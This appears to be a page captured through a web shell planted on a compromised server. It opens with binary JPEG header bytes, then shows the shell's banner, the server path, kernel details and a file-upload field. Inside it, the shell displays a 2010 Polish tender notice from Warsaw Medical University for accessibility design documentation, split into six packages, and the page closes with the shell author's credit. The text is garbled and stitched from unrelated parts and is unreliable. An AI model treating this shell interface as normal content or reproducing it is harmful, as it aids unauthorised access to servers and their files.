JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100430/104907-N-2010.html

<p class="kh_header"><b>Warszawa: Wykonanie dokumentacji techniczno-kosztorysowej dostosowania pomieszczeń dla osób niepełnosprawnych na potrzeby Warszawskiego Uniwersytetu Medycznego w podziale na pakiety</b><br>
<b>Numer ogłoszenia: 104907 - 2010; data zamieszczenia: 30.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Warszawski Uniwersytet Medyczny , ul. Żwirki i Wigury 61, 02-091 Warszawa, woj. mazowieckie, tel. 022 5720366, faks 022 5720377.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wum.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji techniczno-kosztorysowej dostosowania pomieszczeń dla osób niepełnosprawnych na potrzeby Warszawskiego Uniwersytetu Medycznego w podziale na pakiety.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie dokumentacji techniczno-kosztorysowej dostosowania pomieszczeń dla osób niepełnosprawnych na potrzeby Warszawskiego Uniwersytetu Medycznego w podziale na pakiety:
Pakiet 1 - Wykonanie dokumentacji techniczno-kosztorysowej dostosowania toalet studenckich do potrzeb osób niepełnosprawnych w budynku Wydziału Farmaceutycznego przy ul. Banacha 1, Pakiet 2 - Wykonanie dokumentacji techniczno-kosztorysowej podjazdów-pochylni dla niepełnosprawnych przy podestach wewnętrznych w budynku Wydziału Farmaceutycznego przy ul. Banacha 1, Pakiet 3 - Wykonanie dokumentacji techniczno-kosztorysowej wymiany drzwi wejściowych do holu głównego od strony ul. Banacha na drzwi rozsuwane automatycznie w budynku Wydziału Farmaceutycznego przy ul. Banacha 1, Pakiet 4 - Wykonanie dokumentacji techniczno-kosztorysowej przebudowy i dostosowania toalet studenckich do potrzeb osób niepełnosprawnych w budynku Zwierzętarni przy ul. Pawińskiego 3c, Pakiet 5 - Wykonanie dokumentacji techniczno-kosztorysowej dostosowania toalet studenckich do potrzeb osób niepełnosprawnych na I i III piętrze w budynku Logistyki przy ul. Pawińskiego 3, Pakiet 6 - Wykonanie dokumentacji techniczno-kosztorysowej dostosowania do potrzeb osób niepełnosprawnych budynku Dydaktycznego przy ul. Nowogrodzkiej 73.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności, posiada wiedzę i doświadczenie, dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia oraz znajduje się w sytuacji ekonomicznej i finansowej umożliwiającej realizację zamówienia Wykonawca składa:Pakiet 1: wykaz wykonanej w okresie ostatnich 3 lat przynajmniej jednej dokumentacji projektowej (jeżeli okres prowadzenia działalności Wykonawcy jest krótszy - w tym okresie), polegającej na wykonaniu dokumentacji projektowo-kosztorysowej o wartości co najmniej 10.000,00 zł brutto.
Pakiet 2: wykaz wykonanej w okresie ostatnich 3 lat przynajmniej jednej dokumentacji projektowej (jeżeli okres prowadzenia działalności Wykonawcy jest krótszy - w tym okresie), polegającej na wykonaniu dokumentacji projektowo-kosztorysowej o wartości co najmniej 9.000,00 zł brutto
Pakiet 3: wykaz wykonanej w okresie ostatnich 3 lat przynajmniej jednej dokumentacji projektowej (jeżeli okres prowadzenia działalności Wykonawcy jest krótszy - w tym okresie), polegającej na wykonaniu dokumentacji projektowo-kosztorysowej o wartości co najmniej 16.000,00 zł brutto
Pakiet 4: wykaz wykonanej w okresie ostatnich 3 lat przynajmniej jednej dokumentacji projektowej (jeżeli okres prowadzenia działalności Wykonawcy jest krótszy - w tym okresie), polegającej na wykonaniu dokumentacji projektowo-kosztorysowej o wartości co najmniej 8.000,00 zł brutto
Pakiet 5: wykaz wykonanej w okresie ostatnich 3 lat przynajmniej jednej dokumentacji projektowej (jeżeli okres prowadzenia działalności Wykonawcy jest krótszy - w tym okresie), polegającej na wykonaniu dokumentacji projektowo-kosztorysowej o wartości co najmniej 10.000,00 zł brutto
Pakiet 6: wykaz wykonanej w okresie ostatnich 3 lat przynajmniej jednej dokumentacji projektowej (jeżeli okres prowadzenia działalności Wykonawcy jest krótszy - w tym okresie), polegającej na wykonaniu dokumentacji projektowo-kosztorysowej o wartości co najmniej 18.000,00 zł brutto
Wykaz ma zawierać informacje dotyczące przedmiotu, wartości usług projektowych, datę ich wykonania, odbiorców - wg wzoru stanowiącego Załączniki od 4.1 do 4.6 do SIWZ;
2) dokumenty potwierdzające, że usługi ujęte w ww. wykazie zostały wykonane z należytą starannością. Przedkładane dokumenty (referencje) muszą zawierać co najmniej:
a) wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu realizował usługi w zakresie odpowiadającym swoim rodzajem przedmiotowi  zamówienia,
b) wskazanie podmiotu, na rzecz którego realizowane były usługi, 
c) opinię podmiotu wskazanego stwierdzającą, że usługi były realizowane należycie
2. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły /spełnia - nie spełnia/ na podstawie informacji zawartych w dokumentach i oświadczeniach, o których mowa w rozdziale IX SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia z ważnymi uprawnieniami bez ograniczeń do pełnienia samodzielnych funkcji w budownictwie w zakresie projektowania, (wymagane uprawnienia projektowe bez ograniczeń w branży sanitarnej i elektrycznej dla Pakietów 1, 4, 5, 6 oraz wymagane uprawnienia projektowe bez ograniczeń w branży elektrycznej dla Pakietów 2 i 3) wraz z informacjami na temat ich kwalifikacji zawodowych doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także w zakresie wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami wg wzoru stanowiącego Załącznik nr 5 do SIWZ.
4) oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia bez ograniczeń do pełnienia samodzielnych funkcji w budownictwie (wymagane uprawnienia projektowe bez ograniczeń w branży sanitarnej i elektrycznej dla Pakietów 1, 4, 5, 6 oraz wymagane uprawnienia projektowe bez ograniczeń w branży elektrycznej dla Pakietów 2 i 3) oraz posiadają aktualny wpis na listę członków właściwej izby samorządu zawodowego
2. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły /spełnia - nie spełnia/ na podstawie informacji zawartych w dokumentach i oświadczeniach, o których mowa w rozdziale IX SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Mając na uwadze postanowienia art. 144 ust. 1 ustawy, zakazujące zmian istotnych postanowień zawartej umowy w stosunku do treści oferty, z zastrzeżeniem przewidywanych okoliczności określonych przez Zamawiającego w treści ogłoszenia o zamówieniu lub SIWZ, Zamawiający dopuszcza możliwość zmiany umowy w zakresie terminu realizacji zamówienia, o którym mowa w rozdziale IV SIWZ wyłącznie z przyczyn niezależnych od Wykonawcy z zastrzeżeniem, że termin ten nie może być dłuższy niż 30 dni kalendarzowych od upływu ostatniego dnia terminu określonego w rozdziale IV SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wum.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Warszawski Uniwersytet Medyczny, Dział Zamówień Publicznych, pok. 312
ul. Żwirki i Wigury 61, 02-091 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2010 godzina 10:00, miejsce: Warszawski Uniwersytet Medyczny, Dział Zamówień Publicznych, pok. 312
ul. Żwirki i Wigury 61, 02-091 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1 - Wykonanie dokumentacji techniczno-kosztorysowej dostosowania toalet studenckich do potrzeb osób niepełnosprawnych w budynku Wydziału Farmaceutycznego przy ul. Banacha 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 1 - Wykonanie dokumentacji techniczno-kosztorysowej dostosowania toalet studenckich do potrzeb osób niepełnosprawnych w budynku Wydziału Farmaceutycznego przy ul. Banacha 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2 - Wykonanie dokumentacji techniczno-kosztorysowej podjazdów-pochylni dla niepełnosprawnych przy podestach wewnętrznych w budynku Wydziału Farmaceutycznego przy ul. Banacha 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 2 - Wykonanie dokumentacji techniczno-kosztorysowej podjazdów-pochylni dla niepełnosprawnych przy podestach wewnętrznych w budynku Wydziału Farmaceutycznego przy ul. Banacha 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3 - Wykonanie dokumentacji techniczno-kosztorysowej wymiany drzwi wejściowych do holu głównego w budynku Wydziału Farmaceutycznego przy ul. Banacha 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 3 - Wykonanie dokumentacji techniczno-kosztorysowej wymiany drzwi wejściowych do holu głównego od strony ul. Banacha na drzwi rozsuwane automatycznie w budynku Wydziału Farmaceutycznego przy ul. Banacha 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4 - Wykonanie dokumentacji techniczno-kosztorysowej przebudowy i dostosowania toalet studenckich do potrzeb osób niepełnosprawnych w budynku Zwierzętarni przy ul. Pawińskiego 3c.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 4 - Wykonanie dokumentacji techniczno-kosztorysowej przebudowy i dostosowania toalet studenckich do potrzeb osób niepełnosprawnych w budynku Zwierzętarni przy ul. Pawińskiego 3c.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5 - Wykonanie dokumentacji techniczno-kosztorysowej dostosowania toalet studenckich do potrzeb osób niepełnosprawnych na I i III piętrze w budynku Logistyki przy ul. Pawińskiego 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 5 - Wykonanie dokumentacji techniczno-kosztorysowej dostosowania toalet studenckich do potrzeb osób niepełnosprawnych na I i III piętrze w budynku Logistyki przy ul. Pawińskiego 3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6 - Wykonanie dokumentacji techniczno-kosztorysowej dostosowania do potrzeb osób niepełnosprawnych budynku Dydaktycznego przy ul. Nowogrodzkiej 73.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 6 - Wykonanie dokumentacji techniczno-kosztorysowej dostosowania do potrzeb osób niepełnosprawnych budynku Dydaktycznego przy ul. Nowogrodzkiej 73..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com